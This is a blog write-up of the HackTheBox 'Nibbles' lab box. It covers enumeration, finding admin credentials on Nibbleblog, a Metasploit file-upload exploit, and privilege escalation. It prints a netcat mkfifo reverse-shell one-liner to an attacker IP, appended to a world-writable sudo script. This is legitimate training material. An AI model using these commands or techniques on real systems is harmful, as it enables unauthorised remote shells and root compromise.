Skip to main content
ximnoise
  1. Blog/

Writeup HTB Nibbles with Metasploit

·405 words·2 mins
Tech HTB Writeup
ximnoise
Author
ximnoise
Sysadmin & Security Engineer
Table of Contents

Nibbles was my first write up and my first pwn box on HackTheBox. Nibbles is on of the easier boxes. It host a vulnerable instance of Nibbleblog. There’s a Metasploit exploit for it that I use.

Enumeration
#

Nmap
#

The initial nmap scan we can see that the host is likely Ubuntu Linux and exposes an OpenSSH server (Port 22) and an Apache web server (Port 80).

nmap output

Port 80 recon
#

Browsing the target page shows a simple “Hello World!” message.

hello world page

After a quick check of the page source we see an interesting comment.

page source with comment

/nibbleblog
#

By browsing this site we see a empty instance of Nibbleblog “Powered by Nibbleblog”.

nibbleblog main page

When we look up Nibbleblog for vulnerabilities we find an Metasploit module that works with version 4.0.3. At the moment we don’t know the exact version of the Nibbleblog instance. For the Metasploit module we need user-supplied credentials to authenticate the admin portal.

Gobuster
#

We can use gobuster to look for an admin portal. After a quick check gobuster confirms the presence of an admin panel under admin.php.

nibbleblog admin login page

Also we see a README page with interesting information regarding the version number. So the Nibbleblog instance is vulnerable to the Metasploit module.

readme page with interesting information

Identifying Credentials
#

In exploring the resulting paths we find /nibbleblog/content with dir list enabled. Digging deeper, we find a page /nibbleblog/content/private/userx.xml that reveals our needed username admin.

page with user information

Logging into admin panel
#

I wasn’t able to find the admin password elsewhere on the page. So i tried nibbles as password and luckily we are in.

nibbleblog admin panel logged in main page

Remote Code Execution
#

To get a reverse shell on the box we use the shell-session exploit/multi/http/nibbleblog_file_upload Metasploit module.

metasploit search for exploit

After setting all parameters rhosts, lhost, username, password, targeturi we can exploit the Nibbleblog instance.

metasploit exploit with all options set

User Flag
#

After getting the reverse shell we can upgrade our shell and get the user.txt with the flag.

terminal output with the user flag

Root Flag
#

When we are the user we can check with sudo -l what are we allowed to run without a password.

terminal output from sudo -l

So we can see that we can run monitor.sh and this script is also world-writable.

terminal output from monitor.sh with permissions

Because of that we can easily execute our reverse shell code from inside this file. So rather than overwriting the script, we append our code to the end echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.3 8083 > /tmp/f" >> monitor.sh and execute it with sudo.

terminal output from monitor.sh after execute
terminal output from netcat with root access

Now we can easily grab the root flag.

terminal output with the user flag